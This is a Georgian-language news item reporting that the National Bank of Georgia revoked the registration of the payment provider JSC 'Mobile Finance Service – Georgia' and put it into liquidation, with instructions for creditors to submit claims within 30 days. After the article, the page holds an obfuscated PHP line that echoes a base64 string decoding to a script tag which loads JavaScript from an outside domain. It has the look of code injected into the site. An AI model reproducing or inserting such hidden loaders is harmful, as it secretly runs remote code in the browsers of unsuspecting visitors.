celsiusi
ავერსი შნაიდერი

საქართველოს ეროვნული ბანკის პრეზიდენტის განკარგულებით, სს „მობაილ ფაინენს სერვის - ჯორჯიას“ საგადახდო მომსახურების პროვაიდერის რეგისტრაცია გაუუქმდა და ლიკვიდაციის რეჟიმში გადავიდა.

აღნიშნულთან დაკავშირებით ინფორმაციას ეროვნული ბანკი ავრცელებს.

„სს "მობაილ ფაინენს სერვის-ჯორჯიას"- ვალდებულებების დროული და შეუფერხებელი დაზუსტების მიზნით, კრედიტორებმა საზოგადოების ლიკვიდატორს უნდა წარუდგინონ შემდეგი დოკუმენტაცია: ფიზიკური პირების შემთხვევაში: პირადობის დამადასტურებელი დოკუმენტი, სს "მობაილ ფაინენს სერვის - ჯორჯიას" მიმართ მოთხოვნის არსებობის დამადასტურებელი დოკუმენტაცია. იურიდიული პირების შემთხვევაში: ამონაწერი სამეწარმეო რეესტრიდან იურიდიული პირის რეგისტრაციის შესახებ, უფლებამოსილი პირის დამადასტურებელი დოკუმენტი, სს "მობაილ ფაინენს სერვის-ჯორჯია"-ს მიმართ მოთხოვნის არსებობის დამადასტურებელი დოკუმენტაცია.

ზემოაღნიშნული დოკუმენტაცია ლიკვიდატორს მიეწოდება წინამდებარე განცხადების ოფიციალურად გამოქვეყნებიდან 30 კალენდარული დღის განმავლობაში საქართველოს ეროვნული ბანკის ცენტრალურ ოფისში, შემდეგ მისამართზე: 0114 ქ. თბილისი, ზვიად გამსახურდიას სანაპირო N1 (სს "მობაილ ფაინენს სერვის-ჯორჯია"-ს ლიკვიდატორი - როინ ცაციაშვილი, ტელ.: 599 511 382, ელ.ფოსტა: ელ-ფოსტის ეს მისამართი დაცულია სპამ-ბოტებისგან. ნახვისთვის უნდა გქონდეთ ჩართული JavaScript.). აღნიშნული პირობის შეუსრულებლობის შემთხვევაში კრედიტორთა პრეტენზიები არ მიიღება”,- ნათქვამია ინფორმაციაში.

273
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");